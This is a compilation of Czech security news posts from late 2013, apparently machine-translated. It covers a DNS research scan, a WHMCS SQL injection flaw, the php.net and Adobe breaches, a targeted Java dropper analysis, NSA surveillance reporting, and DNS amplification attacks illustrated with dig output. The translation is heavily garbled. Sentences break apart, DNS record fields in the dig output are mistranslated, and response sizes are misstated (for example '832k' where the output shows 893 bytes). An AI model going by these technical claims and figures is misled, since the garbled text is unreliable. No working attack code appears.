Obdrželi jsme žádost z výzkumné skupiny, aby všichni věděli, že budou provádět internetové širokou skenování serverů DNS. To je jejich žádost:

"Náš tým na síťových architektur a služby odbor (I8) TU München, Německo, zahájila DNS scan. To má podobné cíle jako prověřování, které jsme provedli pro SSL a SSH v uplynulých měsících. Opět platí, že Účelem je čistě vědecký. skenování Stroj je 131.159.14.42. jsme dotazování DNS servery k překladu názvů hostitelů. Nechceme žádným způsobem snaží ohrozit serverů. Kromě toho by se zatížení způsobené naší činností je velmi nízká na jednom serveru. Myšlenka našich dotazů je získat lepší pochopení vnitřního fungování DNS, jeden z nejvíce všudypřítomných protokolů internetu. bychom to ocenit to moc, pokud jste přidali komentář v databázi. Vezměte prosím na vědomí, že reagovat na každou stížnost, a jsou rádi, že blacklist systémy s otráveně adminy. "

Jejich účelem je vědecký výzkum. Zajímavý, říkám skenování bez svolení neetické a neslušné. Zde je to, co doporučuji, pokud nechcete být součástí výzkumu, který zablokovat všechny DNS dotazy z dané IP adresy. Oni provedli podobnou SSH a SSL prohlédnutí v minulosti z různých IP adres. Co si myslíte? Dejte nám vědět prostřednictvím našeho Kontaktujte nás stránky nebo v komentářích níže.

Buďme opatrní, tam venku!


Yet Another WHMCS SQL Injection Exploit

5.11.2013 Exploit | Hacking

Update: Patch byl propuštěn minulou noc. Viz http://blog.whmcs.com/?t=80223

WHMCS, populární fakturace / support / zákaznický systém, stále trpí kritických problémů SQL injekce. Dnes, ještě další zranitelnosti, včetně zneužití byl propuštěn.

Vzhledem k tomu, že neexistuje žádná oprava k dispozici na tomto místě budu zdrží propojení všech Exploit detailů, ale je to dost triviální najít odpovídající blogu, který obsahuje skript, který zneužít tuto chybu zabezpečení. WHMCS uznal problému [1]

Hlavní příčinou tohoto problému, stejně jako předchozí problémy se softwarem, se zdá být nedostatek v chápání řádné kontroly, aby se zabránilo SQL injection. Dobrý ověřování vstupu je jen začátek, ale připravené příkazy jsou nutností. Místo toho, WHMCS vývojáři používají poměrně složité (a buggy), funkce uniknout uživatelský vstup a montujeme dynamických SQL dotazů.

Chyba je ve funkci, používané v celé Whmcs, je tak exploit není omezen na konkrétní URL.

[1] http://blog.whmcs.com/?t=80206


CSAM - Proč jsem viděl DNS Žádosti o IANA.ORG v mém Firewall Logs?

5.11.2013 Hacking | Zabezpečení

Jako součást Cyber-Security Awareness měsíce, jeden z našich čtenářů poslal nás výpis z jejich záznamu pro firewall. Události zájmu, kde pravidelný vzor interní hostitele dělat DNS dotazy do několika počítačů na iana.org.

Takže jinými slovy, tisíce odchozí DNS dotazy na internetových hostitelů, kteří nejsou v každém DNS nebo DHCP konfigurace uvnitř organizace. Co s tím? po chvilce hledání jsme našli odpověď v RFC6304 a RFC6305, také http://support.microsoft.com/kb/259922. Já hlavně jako název RFC6305 je - " ! jsem byl napaden PRISONER.IANA.ORG " V prostém anglicky, když nemáte reverzní DNS zóny zřízené pro vaše interní podsítí, bude každý jednotlivec stanice pokusí zaregistrovat reverzní záznam s těmito hostiteli na IANA. Je to jen část toho, jak je dále navržen DNS, není to k žádnému konkrétnímu výrobce operačního systému (takže to není "věc okna"). řešení? Konfigurace reverzní DNS zóny pro každou zónu uvnitř vaší organizace.

Zatímco reverzní DNS zóny mají velký aplikací pro penetrační testery, ale jsou také velmi * * vhodné pro mnoho "důvěryhodně" důvodů:

To vám pomůže identifikovat hostitelů z IP adres, které by mohly ukázat ve vašem firewallu a dalších protokolů (to je jeden velký)
Pomáhá při definování Active Directory "webů", který bude na oplátku umožní optimalizovat dotazy Domain Controller typu. Například, vytváření webů pro každého vzdáleného umístění kanceláře v organizaci umožňují pracovním stanicím autentizovat řadičů domény ve své místní pobočce, než ožvýkají WAN pásma na ověření proti řadičů domény v ústředí.


Přístup byl odepřen a blacklisty / blocklists

5.11.2013 Bezpečnost | Hacking

Pokud jste surfování na internetu, hlídat své vlastní podnikání a získat přístup odepřen zprávu, můžete pochopitelně zajímalo, proč. Jako jeden Internet surfař zjistil, že se snažil jít na legitimní webové stránky, aby si služby v zemi hodlal na návštěvě. Představte si jeho překvapení, když vidí na obrázku níže ve svém webovém prohlížeči!

Hmm, co by to mohlo znamenat? Kdybych byl na jeho místě bych se pokusit kontaktovat Dshield. Je to skoro, jako kdyby byla společnost pomocí blacklistu nebo blocklist, že tento uživatel byl uveden na jiné lidi tím, že útočí na internetu. Jako obslužné SANS Internet Storm Center máme přístup k Dshield databázi a mohou dotazovat jej. Naše doporučená blok seznam je veřejný a nachází se zde:

https://isc.sans.edu/block.txt

Nicméně IP adresa naší webové surfař není na tomto seznamu. Dotaz na Dshield se výsledek v některých hitů, ve skutečnosti existuje 9, vše z 11. října na portu 80. Ne tak docela agresivní útočník hacking si cestu přes internet. Můj odhad by byl kliknutím na neplatné odkazy, kde býval webové servery, což vede ke zprávám snížil provoz z dané IP adresy.

Co víme je, že určité dodavatele, který musí zůstat bezejmenní v současné době je využití Dshield data nesprávně a nevhodně, a oni by měli přestat. Máte-li poznat tuto chybovou zprávu víte, kdo jste. Pokud využijete této dodavatelé zařízení nebo softwaru na vědomí, že to, co jste funkci zapnutý blokuje zcela nevinné uživatele se snaží koupit své služby. To nečiní nic víc bezpečnější vůbec. Nejsem rád blocklists nebo černých listin vůbec, a to zneužití není nijak zvlášť dobrý nápad.

Buďme opatrní, tam venku!


PHP.net kompromis Následky: Proč Beats podepisování kódu hash
5.11.2013 Hacking | Incidenty

Včera bylo zjištěno, že php.net web byl ohrožen. V tomto bodě, tým php.net věří, že servery byly ohroženy na několik dní, a alespoň jeden soubor byl změněn dodat malware. Aktuální přehled naznačuje, že útočník může mít přístup k serverům tajným klíčem SSL, což naznačuje, že útočník měl roota. [1]

Pravděpodobně nejcennější aktivum přítomen na místě, a to php.net zrcadla je PHP zdrojový kód distribuce, která je používán na místech po celém světě. V tomto bodě, nic nenasvědčuje tomu, že útočník upravený soubor. Ale chci se zaměřit na uživatele, stahování souborů, stejně jako zdrojový kód PHP. Jak si ověřit, že soubor je závazné a ani se s ním manipulovala?

PHP.net vydává MD5 hashe na svých stránkách, které uživatel může použít k ověření binární. Nevadí, že MD5 není nejsilnější algoritmus hash. Je to asi dost dobré pro tento účel. Skutečným problémem je, že neexistuje žádný digitální podpis. Útočník by mohl vyměnit zdrojový kód a MD5 hashe, pokud má útočník přístup k serveru, a stejně jako v tomto případě appeareantly je schopen měnit soubory. Digitální podpis by být vytvořeny pomocí tajného klíče daleko od serveru, možná i stále offline. Tímto způsobem by útočník schopen změnit podpis, ale nepoužíváte autorizovaný klíč a koncový uživatel trápí ověření digitálních podpisů bude mít určitou šanci detekovat kompromis. Je smutné, že příliš mnoho projektů, pouze hash (opět: nezáleží na tom, hash použít vše může být nahrazen.).

[1] http://php.net


. QA (Katar) TLD Zhoršení

Hacking
Publikováno: 2013-10-19,
Aktualizováno: 2013-10-19 17:05:00 UTC
tím, Johannes Ullrich (Verze: 1)
0 komentář (ů)

Podle twitteru a zprávy, které jsme obdrželi přímo, zdá se, že. QA (Katar) TLD byla ohrožena včera večer syrské elektronické armády. Postižení domény zdá se vrací zpět k normálu v tomto bodě.

Google stále vrací některé výsledky za compromissed stránek, včetně jeho vlastní qa místo.:

Odkazy na Twitter zpráv o compromisse (sledování na vlastní nebezpečí): hxxp :/ / twitter.com/Pr0udSyrian/status/391525943035969536/photo/1


Cílený útok Zaměřuje se na jednotném systému

4.11.2013 Hacking

Před několika týdny McAfee Labs obdrželi vzorky malware kapátkem Java, který může dešifrovat jeho užitečné zatížení na konkrétním počítači nebo v síti. Po šetření jsme zjistili, že náklad je uzamčen běžet pouze na konkrétním stroji.
Tato hrozba se používá zajímavé techniky, aby zajistil, že lze spustit pouze na cílovém počítači. Tato metoda také je velmi těžké analyzovat.
. Mezi jar soubory obsahoval dva soubory třídy: web.class a stream.class.
Stream.class byl binární soubor. Web.class to popletl pomocí Allatori Obfuscator verze 4,4, díky němuž je těžké dekompilovat třídy Java. Použili jsme disassembler Java číst byte kódu v jazyce Java. Po dekódování řetězce (podle smontování Java byte kódu tisknout na terminálu), to bylo jasné, co kapátko dělá.
java-řetězce
Kapátko byl stále na stroje internetovou IP adresu surfování http://checkip.dyndns.com a pak pomocí IP generovat dešifrovací klíč k dešifrování stream.class a spustit jej a odstraňte nádobu.
Protože jsme byli schopni získat jeden z IP, můžeme dešifrovat stream.class. Dešifrovaný náklad byl zabalen spustitelný. Po vybalení ji, máme další zatemnil spustitelný soubor, to obsahovalo DLL a dva šifrované binární soubory.
DLL byla popletl. Každý řetězec byl zašifrován s jiným klíčem a algoritmus (tato technika se vrací s dalšími užitečným zatížením). DLL otevřela dva porty v bráně firewall systému Windows: UDP 1900 a TCP 2869.
První zašifrovaný soubor byl známý adware: SanctionedMedia. Ale může to být zástěrka pro výzkumné pracovníky a systémy automatizace malware.
Druhý soubor je zabalen DLL. Po rozbalení získáme další nabitý DLL, která obsahuje šifrované užitečné zatížení. Tento náklad lze dešifrovat pouze pomocí klíče, který je specifický stroj.
Specifické pro daný počítač klíč je generován pomocí adresáři systému je vytvoření časového razítka a hlasitost sériové číslo pro oddílu obsahujícího systémový adresář.
MachineDecrypt
Neměli jsme informace, generovat klíč, ale my jsme získali jedno rozbalené vzorek.
Tato knihovna byla plná používat upravenou verzi UPX. Tento spustitelný soubor byl popletl jako firewall DLL s každým řetězcem šifrována jiným klíčem a algoritmu.
Tato hrozba byla specifická pro jeden stroj, takže to není něco, co musíte dělat starosti. Nicméně, tady je naše rady, jak čelit tomuto typu útoku:
Vždy mějte svůj osobní bránu firewall
Buďte opatrní při otevírání souborů příloh z neznámého nebo podezřelého zdroje
Prohlédněte si webové stránky opatrně a vyhnout procházení neznámých míst
Udržujte svůj boj s malware software aktuální a zvážit využívající aplikace Whitelisting
Použít nejnovější opravy zabezpečení pro systém Windows a aplikace třetích stran, včetně těchto populárních cílů: Internet Explorer, Microsoft Office, Adobe Reader, Flash Player, Java a QuickTime


NSA popírá krádeže dat z datacenter Googlu a Yahoo

3.11.2013 Šifrovaní | Incidenty | Hacking
Šéf americké národní bezpečnostní agentury (NSA) popřel, že by organizace tajně zachycovala velké množství informací ze serverů Googlu a Yahoo, aniž by měla od těchto společností svolení.

Generál Keith Alexander odpovídal na otázky ohledně této zprávy, se kterou první přišel magazín Washington Post na konferenci o kyberbezpečnosti. „Podle mých znalostí se nic takového nikdy nestalo,“ řekl.

Podle Washington Postu nové informace z dokumentů, které odtajnil Edward Snowden, popisují program s názvem MUSCULAR, přes který mohli američtí a britští agenti zasahovat do optických kabelů a kopírovat tak přenášená data.

Alexander, který řekl, že o tom nic neví, také připomněl, že mediální zprávy z dřívějška o programu PRISM, který média popsala jako „zadní vrátka“ byly „fakticky nepřesné“.

„NSA se do databází nevkrádá. Bylo by to vysoce nelegální. Takže nevím, co v té zprávě je, ale mohu vám říct, že přístup na servery Googlu ani Yahoo nemáme,“ oznámil. „Nemáme autorizaci prohledávat servery amerických společností a kopírovat jejich data. Aby bylo něco takového možné, muselo by to být schváleno soudně.“

Když byl Alexander dotázán na to, zda data z amerických společností, které NSA uvedla ve svém přehledu, byla získána soudním příkazem, odpověděl: „Přesně tak.“

MUSCULAR však operuje mimo Spojené státy, kde na NSA neplatí stejná omezení jako při domácích operacích. „Taková široká sbírka internetového obsahu by byla ve Spojených státech nelegální. Operace však probíhají v zahraničí, kde může NSA předpokládat, že je každý, kdo používá zahraniční datové linky, cizinec,“ popsal magazín.

Takže PRISM sice funguje pod dohledem soudu pro zahraniční zpravodajství, pro MUSCULAR však žádné podobné opatření neexistuje. Dříve v tomto roce NSA podala zprávu, podle které nasbírala za 30 dní více než 180 milionů záznamů.

Toto obvinění pravděpodobně naruší důvěru zahraničních firem a zákazníků ještě více. Už dříve celá řada poskytovatelů cloudu informovala, že zákazníci se začínají obávat ukládat svá data v amerických firmách, o své informace se začínají bát a tento strach byl Snowdenovým odhalením ještě umocněn.

Poté, co společnosti zjistily, že se potýkají s nedostatkem důvěry, několik z nich včetně Googlu a Yahoo začalo vyhledávat oprávnění zveřejňovat více informací o tom, jaká data zpravodajským službám poskytují. Ministerstvo spravedlnosti však takovým žádostem odolává.


Útok na Adobe: Prolomeno přes 38 miliónů účtů

3.11.2013 Incident | Kriminalita | Hacking
Uživatelů poškozených při posledním rozsáhlém průniku do databází Adobe je nakonec mnohem více, než společnost původně přiznávala.

Za útokem na GMail stála chyba v přehrávači Flash Player
Začala nová vlna útoků přes SQL injection
Podle nejnovějšího zjištění společnosti Adobe došlo k odcizení přístupových údajů k účtům více než 38 miliónů aktivních uživatelů. Původní zpráva přitom hovořila o 2,9 miliónu napadených účtů.

Útočníci rovněž získali přístup k blíže nespecifikovanému množství účtů nevyužívaných po dobu dvou let či déle.

Kyberzločincům se vedle toho podařilo odcizit části zdrojového kódu populárního grafického nástroje Photoshop. Stejný osud postihl i Acrobat, program pro úpravu PDF dokumentů, a ColdFusion, nástroj pro vývoj webových aplikací.

Analýzou informací získaných ze zdrojových kódů si mohou útočníci udělat dobrý obrázek o funkcích programů a pokusit se pak tyto techniky napodobit.

Důvod, proč původní zpráva obsahovala špatná čísla, je podle mluvčí Adobe jednoduchý. Společnost tehdy zkrátka ještě neznala přesný rozsah škod. „Zveřejnili jsme proto jen ty informace, u kterých jsme si byli 100% jisti,“ řekla mluvčí.

Adobe nicméně věří, že k odcizení informací o kreditních kartách, expiračních datech a dalších dat spojených s uživatelskými objednávkami došlo „jen“ u původních tří miliónů účtů. Ze zbývajících 35 miliónů účtů si prý útočníci odnesli „pouze“ uživatelská ID a hesla.

Společnost již preventivně změnila přístupová hesla ke všem zneužitých účtům. To však útočníkům nijak nezabrání v přístupu na uživatelské účty u jiných služeb, pokud k nim zákazníci Adobe přistupují pomocí stejných jmen a hesel.

Podle Briana Krebse, známého bezpečnostního blogera, který na zneužití účtů upozornil jako první, se milióny uživatelských jmen a hesel objevily na fóru navštěvovaném kyberzločinci o minulém víkendu. Podle mluvčí Adobe byl již dokument z fóra na žádost společnosti odstraněn.


Použití RRL zabránit DNS Amplification útoky
16.10.2013 Počítačový útok | Hacking

Jeden běžně používaný způsob Distributed Denial of Service (DDoS) útok je zesílení DNS útok. DNS Amplification využívá bez státní příslušnosti povahy DNS dotazů na vytvoření padělaných požadavky DNS prostřednictvím otevřených rekurzivních DNS serverů a směruje tyto žádosti k cíli útoku DDoS.

Pokud je poslední věta zdála kompletní blábol, to by mohlo pomoci dána příklad. Hactivist rozhodne, že má zášť proti svému rychlého občerstvení firmy clon, stačí pouze nabídnout své dýně Milkshake 2 měsíce v roce. Tento hacker ovládá botnet s 5000 uzly, které mohou zahájit 100 Mbit útok proti své webové stránky. To není dost, aby se vaše webové stránky, takže se nemusíte starat o to. Ale naše určena hactivist udělal svůj domácí úkol a identifikuje tisíce otevřených překladače. Otevřené resolver cache DNS server, který umožňuje komukoliv, aby se dotazy (pokud máte jeden byste opravdu měli zakázat).

Po identifikaci otevřené resolvery útočník pokyn její botnet poslat kované DNS dotazy na otevřené překladače s IP adresou vašeho webserveru jako kované původní šetření. Tak, teď, místo 100 Mbit útoku můžete být hit s 10 Gigabit trvalého útoku. Jak to funguje? Vytvořením velké odpovědi DNS. Zatímco útočník DNS dotazy jsou menší než 512k odpovědi může být podstatně větší. Například, pokud si poslat jakýkoliv dotaz společnosti Microsoft získáte 832k odpověď:

-Sh-3.2 $ dig microsoft.com ANY

; Zkrácený, opakování v režimu TCP.

; << >> Dig 9.3.6-P1-RedHat-9.3.6-16.P1.el5_7.1 << >> microsoft.com ANY
; Globální možnosti: printcmd
; Dostal odpověď:
; - >> HEADER << - opcode: QUERY, status: NOERROR, id: 42610
; Vlajky: qr aa rd žádost: 1, odpověď: 11, AUTHORITY: 5, DODATEČNÉ: 10

; OTÁZKA sekce:
; Microsoft.com. V každém

; ODPOVĚĎ sekce:
microsoft.com. 3600 IN TXT "v = spf1 patří: _SPF-a.microsoft.com patří: _SPF-b.microsoft.com patří: _SPF-c.microsoft.com patří: _SPF-SSG-a.microsoft.com patří: SPF- . hotmail.com IP4: 131.107.115.215 IP4: 131.107.115.214 IP4: 205.248.106.64 IP4: 205.248.106.30 IP4: 205.248.106.32 ~ all "
microsoft.com. 3600 IN TXT "FbUF6DbkE + Aw1/wi9xgDi8KVrIIZus5v8L6tbIQZkGrQ/rVQKJi8CjQbBtWtE64ey4NJJwj5J65PIggVYNabdQ =="
microsoft.com. 3600 IN MX 10 mail.messaging.microsoft.com.
microsoft.com. 3600 IN SOA ns1.msft.net. msnhst.microsoft.com. 2013081506 300 600 2419 200 3600
microsoft.com. 3600 IN A 65.55.58.201
microsoft.com. 3600 IN A 64.4.11.37
microsoft.com. 172799 IN NS ns1.msft.net.
microsoft.com. 172799 IN NS ns4.msft.net.
microsoft.com. 172799 IN NS ns2.msft.net.
microsoft.com. 172799 IN NS ns3.msft.net.
microsoft.com. 172799 IN NS ns5.msft.net.

; AUTHORITY sekce:
microsoft.com. 172799 IN NS ns5.msft.net.
microsoft.com. 172799 IN NS ns4.msft.net.
microsoft.com. 172799 IN NS ns1.msft.net.
microsoft.com. 172799 IN NS ns2.msft.net.
microsoft.com. 172799 IN NS ns3.msft.net.

; DALŠÍ SEKCE:
ns1.msft.net. 3599 IN A 65.55.37.62
ns1.msft.net. 3599 IN AAAA 2a01: 111:2005 :: 01:01
ns2.msft.net. 3599 IN A 64.4.59.173
ns2.msft.net. 3599 IN AAAA 2a01: 111:2006:6 :: 01:01
ns3.msft.net. 3599 IN A 213.199.180.53
ns3.msft.net. 3599 IN AAAA 2a01: 111:2020 :: 01:01
ns4.msft.net. 3599 IN A 207.46.75.254
ns4.msft.net. 3599 IN AAAA 2404: f800: 2003 :: 01:01
ns5.msft.net. 3599 IN A 65.55.226.140
ns5.msft.net. 3599 IN AAAA 2a01: 111:200 f: 1 :: 01:01

; Dotaz: 1 ms
; SERVER: 199.58.210.9 # 53 (199.58.210.9)
; KDY: Pátek 16 srpen 2013 17:12:53
; MSG SIZE rcvd: 893
Spuštění jakýkoliv dotaz proti DHS.GOV vrací 4453K odpověď:

-Sh-3.2 $ dig dhs.gov ANY
; Zkrácený, opakování v režimu TCP.

; << >> Dig 9.3.6-P1-RedHat-9.3.6-16.P1.el5_7.1 << >> dhs.gov ANY
; Globální možnosti: printcmd
; Dostal odpověď:
; - >> HEADER << - opcode: QUERY, status: NOERROR, id: 7097
; Vlajky: qr aa rd žádost: 1, odpověď: 35, AUTHORITY: 8, DODATEČNÉ: 7

; OTÁZKA sekce:
; Dhs.gov. V každém

; ODPOVĚĎ sekce:
dhs.gov. 900 V RRSIG TYPE51 8 2 900 20130824205017 20130814202047 35505 dhs.gov. HfARElBQz4seqIK0tXXq6SdESpsMpr3jOgmok9AZ0DPbGT3sjtGzZnrg yB + sTF5WeMCS2l85BvtIjdTqWUIt9R80VMBKGEKlN6max/vqQ8h09wqk q5rHod78qXVrqLM7QeN7Bo2BW5/wGpo1b/lMoJJ38xm8dob/WU7uDS7 / / M4 =
dhs.gov. 900 V RRSIG TYPE51 8 2 900 20130824205017 20130814202047 50970 dhs.gov. mL2E0vW6pY + g0w3qN7qEnDiCJpu2B1JoG/MMSog73CSPSJIddOy11XI3 n4i99oCH7mxW3zltMxjxGfo2RtF0Cw/y1JH3lzbIWqTSIO5bh5bKeTn2 iCv0192xImxa7jh4olQhKPUbxdiVryc3fgAx6pVtSmmkKPpZXefXfyzT Xe4 =
dhs.gov. 900 V TYPE51 \ # 11 0100000A06D74C53E10A09
dhs.gov. 432000 IN RRSIG DNSKEY 8 2 432000 20130824204826 20130814202545 6340 dhs.gov. phDh5VIA3LQMhxVyYSkh5zNjIRXrmut + ltLANu08vHzs5baK/NmW2I46 / / tjPWlxxRb/a7Uq6lrDV6vwdM9CH0nsTurPsX + gSBi1QA95wHAhC8et hFYHkMfKxpaZH8LOWyYANrs1Q1D8rqYoxIBle/kpB2Jx3hvh939j3 / / e n7zzVXAraumzxWvQSySueFxTzQWmRdFTSGPYhfw0HkJvax59HXEoBLqP C1Lfdps4pN8TNz6OiR7QRAh8dQNyqutWEErI6I2OaoErFrbZEHIadkMq ncEZ5McU2oV3LcfTlvdeCNR4w64SL0M0cq01JVJvsyvL12iFHTkIRAMe fQmTug ==
dhs.gov. 432000 IN RRSIG DNSKEY 8 2 432000 20130824204826 20130814202545 35505 dhs.gov. r/nZTNnJwYa0OijRKkRrpAcWjYGUnclIDa/zgV0IF1jeDm3acztxXyW3 HwmyZqqdF6i0kOsHOCQDaLTALow0OD8n0pJnICHji4L7PMYbo8HII8AG xpvsrGa2RcowKJmWfukoXUzxFDVvJF3eou + ObJBdpXPW1kBeFSDY4Ud / 0yg =
dhs.gov. 432000 IN RRSIG DNSKEY 8 2 432000 20130824204826 20130814202545 50970 dhs.gov. UNDgPSVIg2iHJI3Up26xYfNF2S2Z6cxvKY79btL7W5iJ41jdm9XQl5g3 1uk/v/jL5 + + O9FipHy9e/th8 QpT8js3namWRvomZMbV2Auhl7u8bkw6T 6UYMwCzo5mM2n9aRKL6CIp6E5iZqUITqMwcx8NOYXiHo/bo9vCaaON/V 7C4 =
dhs.gov. 432000 IN RRSIG DNSKEY 8 2 432000 20130824204826 20130814202545 55984 dhs.gov. dhQxhmXXejyIrZ2dk8T3phdJg2jQGvnEaibKeV3Q + kAB10rw7PiL03S0 F5Fg5MicoH3g8GLj4TfcF1AUOkwNJmY9/UmnqXOr1KeYLqWPvtBckSMO 6VG9S6flI/STH0w0aJ6HuOfbdX0/QmmYYf841sGpeERiWbqD/56/Z5KO A7b8Q4vW87HkLktveakHiRsUOQse0PGZ08R9CeLuWKyzGhNS2pO6Vebi 7h2NNMaMMJMmBgbOdc7RsGFJstkTQfICvOJateGkx5V161v/YpSs2iAk hFQk/VCIFqGcQI0jhBVTkF7 + FE0N6S 1 E5LXVGj4vKsgwbXYiCQZ + Hbd u6N + iQ ==
dhs.gov. 432000 IN DNSKEY 256 3 8 AwEAAdr5ZcOawyjc0khJmGCs3zuAXF9dkMIvbO/Td9hCNeRt4GDnfBCR IVnv9DPjMk1N8659bNxnu23n5c2lQWkqRoV9kg3f0GA + Ebw4oFbug0KI 32785v1DIl4i + + TGrPp7u64PIbablgilzkmH2NXH qLJLyzfm3A8fUW56 Nu2bjF67
dhs.gov. 432000 IN DNSKEY 257 3 8 AwEAAdCPBJACeS7 + jhZV2p76YkyjtnL/395HFQLGoZhCSTmcjFbxZc4Y ZP9428VwE6ZjSi0m0UhWPqtRIpgIHP0mbWGfVz/OLDiI4bt3sHYmNjT1 bY9xxkUQEbfSTIaWgW7U6q7QjPVJ3lH3suT0kC70snNdWmWLkIbo74P4 SbxCXIzBYU + D/hfhC3pyFl63U8JFlWTBOi1hNmh0dXycUlRTkkxFv4V2 3okFI1 + kpFZFZ5O + + IJNzhuLPYpabFkpm5p0PvKN9 RZE/kKacrb372i7 NXQeU0LFEUmBBFHbOX5wI8pwEo1pXVwGVTgbmDX/QikbKvjMBiEHEz1M pccFjQ3qfis =
dhs.gov. 432000 IN DNSKEY 257 3 8 AwEAAe2TaoLtHepWJ4MrICWbyzuipCC2Rit/F3ngUyTFF/tcmZfSjv7j DzACk78iG91unXqqZefS + + wqYoNBahITzuduzax j5QEPE9l2O4OyldT / lhPIcFmxe5n + H7BFuElwbRqmq1CF/Gq6auNaAlDTQSw35EQpJVrMw5o3 oXQtC + Fs7zDzvrMY + + I4Kd87Mg5aAp83c/Ju6QiRGMb5l3maLg ofbdTN KAYVEfPPqUxlYjpa + UDyjuEB1EeKcnpw4H02PHPZNN1k6GCTjkkjUvqS T + EEtpb / nWdJUf + t2xqnY6TzUgMtrAD2ryV8x2keSdShCNKp9QAjRmHB n5CBN15htQc =
dhs.gov. 432000 IN DNSKEY 256 3 8 AwEAAdqX4Bc6MQUoLVLjg5ZdPiJvRzgAfw1h3Rjdm8c67E8h0uegaeJC jR1piVN/yXIAksqMOsd4ExtQCcbAmc1p + yDdL/VIr9B8FDpCply3J/z5 7x2NMDqrtNwgrxmwETEvQtdUHVDs/bq6ntbuiedO4RM9D2smgOCfamf / kll4nKCj
dhs.gov. 28800 IN MX RRSIG 8 2 28800 20130825164115 20130815163139 35505 dhs.gov. hx8ipwMvRF2Rzi7E3HGVMPEffuq4W + U3Y8Dhw0kJ 3 vNpDCikWPbPcCh kQKVvJyIEwdcbubkedIul8bcO5/STnAyN + l61qGT/AOhFvTCBSVr7evf F0zdVU2W2DbSnivF3BR5GAjqm6lXL/mowiCjRq7KcCaofwWnlZujmwQS oso =
dhs.gov. 28800 IN MX RRSIG 8 2 28800 20130825164115 20130815163139 50970 dhs.gov. XdgjtPV4 11 HJVNkSSzblg/6rKaou7gmaCm3 + NW1aUhRM/eA9a0v/RUd 2KcznCghAPu4jcePMqs 4 BoqQbGVF5C7CZvZBizXQNBwOvM1i8iJlmJy R/GrnEX8w8uQ4CQyP5zqLcDCgpZhso/r7cSoF2wy6vH + mvSj2Um7UASv T5Y =
dhs.gov. 28800 IN MX 10 mail.us.messaging.microsoft.com.
dhs.gov. 28800 IN SOA RRSIG 8 2 28800 20130826103555 20130816093555 35505 dhs.gov. yYbMLFPwR1TvX4sR8 + + DXNB8m25rKuH6ULZtnh4dBiVcHc5fwflTXIHqR KLOM77uPV0g2O4tLDxHZeCCxCO5qRlGPy1HMA6jxsM121xZyV6L8GcU egTr/G6G51GA0gK0/For8rScN33pPSn1f + 1 F5GkFORPIIwgq + qqBhnh ACU =
dhs.gov. 28800 IN SOA RRSIG 8 2 28800 20130826103555 20130816093555 50970 dhs.gov. Es4oH8nJVt9IrM64FAeW6wmzNGvTUQpEFttwKOaCU1jicX70fkkWp8xM 3jJ90KBdaYV8wc5SYqnm3Dvdv0N6h6Zp7V + zZgAWYtxG0L25q05jmcZ7 KrVNVegupNSFRjlXx/I4bGjXDMGSUwCVvUJOxrDIdKDSqtl8ljjnfVjC Nx0 =
dhs.gov. 28800 IN SOA ns5.dhs.gov. dnssec1net.cbp.dhs.gov. 2008084610 10800 1080 604800 900
dhs.gov. 28800 IN NS RRSIG 8 2 28800 20130826103306 20130816093540 35505 dhs.gov. b4j8L1J8E4esATBT2naapjrSzAU1nYDfvI6GYCsMuLJf/dgI/s1tRnpA PZprb6Ia0XapPya8bFunq2oA0MNCmL1fYsvH05tSiSadRkdR765aFfV1 qEsa9UPK96uzYFuAen16tD4XjtaVpVBhKbnWW/eFMX4E9Ue1R8YAm4aj IKA =
dhs.gov. 28800 IN NS RRSIG 8 2 28800 20130826103306 20130816093540 50970 dhs.gov. NDN1xTmjgBvlwZsdUhzUgbAfsKqJsqoxjcKDV9msPt/W1MpTnRYpHAvu gGODPKD8P7/hkxMsO2nHkvTp0G0fz3et5lLfXLMpJLwu + s / fbKNl 9 Lh QxAFGa1PbyLh5R/etvxS3kqr6XJqZOWxEFaEuKsv8Q1qu3fNi3J/CAYB gqg =
dhs.gov. 900 V RRSIG A 8 2 900 20130826020707 20130816011426 35505 dhs.gov. yt + pKyKjeLs5KCiMXPIPXbjHKzXwmZ2aZAAjAZeSdiGitZJBioIrIDER ozRW5H1o4Bt1RL3b3CS4fSBb8A8Ip5iqXKISWlKkCnbzag/Qwokf3ao9 e3pi41sRgjiPyYojCh4 + + xvgC5GUP5YxXI iqdpSp7nyoJGHPQ7K4mwXY INW =
dhs.gov. 900 V RRSIG A 8 2 900 20130826020707 20130816011426 50970 dhs.gov. itIc6xp9Bi0JNqMRFwJKwTUzWdEOJM9JfKRima/pHzebqytyYoHjgWdO eJsbx0CpOunBJv1mbQMA5kD19JrriTIkryrgNuotHswJFWsLC6RqiVMj qE1c/LfZqflOsEpI6Bd4VdhWHe7A96lPxjaK5rTTxUsP2AjpIYrmRki0 1Q8 =
dhs.gov. 900 IN A 173.252.133.166
dhs.gov. 3600 IN RRSIG DS 7 2 3600 20130821100026 20130816100026 58219 gov. KZTyE5CWJARJiY/h2O0y6mH1BzwsuDQUMyzlM3TNA/50iMs9zE1LQhZw kViqgHttxZr + + Ct23FdwStfamCMP9KVCCau2gs xW/6P764GWnzyqcy9R 1KohrdxySvsozG + + + VbiCbkSKZ7 CO8trJHRVFyInC5y4W + vKavpv/m6Q 49RW8VBMUDpPXVxA3ZqaXMrV8A0jSEbMvf 9 Xuzd2KBL7awuL + clIvd4 atcxywlToOrG99VPj9zataYkdB/buYmEI9vT7MW/wYKJOPDdvmMxeLUX g15R8c6CqW45837oGIzV6sPmC9RIMH4sE35q9WVcNY + iO3KV5FhWWLrO qW8c7Q ==
dhs.gov. 3600 IN DS 6340 8 2 28CE7678822B31AA9CCCBF1B27F795BE02BE1355AB6C892C35D11C68 758F75FB
dhs.gov. 3600 IN DS 55984 8 1 79494AAC6BA3A4C1A7749E48443D7150477DEE6E
dhs.gov. 3600 IN DS 55984 8 2 5C3A89A0E66C52C15CE4FA578CB5AF390A42A706B02E9F8105558539 F8216C7B
dhs.gov. 3600 IN DS 6340 8 1 FF3933AE3D8FD8C4DF64A203F72B86B668AC3677
dhs.gov. 28800 IN NS use3.akam.net.
dhs.gov. 28800 IN NS usc2.akam.net.
dhs.gov. 28800 IN NS asia2.akam.net.
dhs.gov. 28800 IN NS usw3.akam.net.
dhs.gov. 28800 IN NS eur2.akam.net.
dhs.gov. 28800 IN NS use1.akam.net.
dhs.gov. 28800 IN NS usw4.akam.net.
dhs.gov. 28800 IN NS asia3.akam.net.

; AUTHORITY sekce:
dhs.gov. 28800 IN NS asia3.akam.net.
dhs.gov. 28800 IN NS usc2.akam.net.
dhs.gov. 28800 IN NS usw4.akam.net.
dhs.gov. 28800 IN NS eur2.akam.net.
dhs.gov. 28800 IN NS use3.akam.net.
dhs.gov. 28800 IN NS usw3.akam.net.
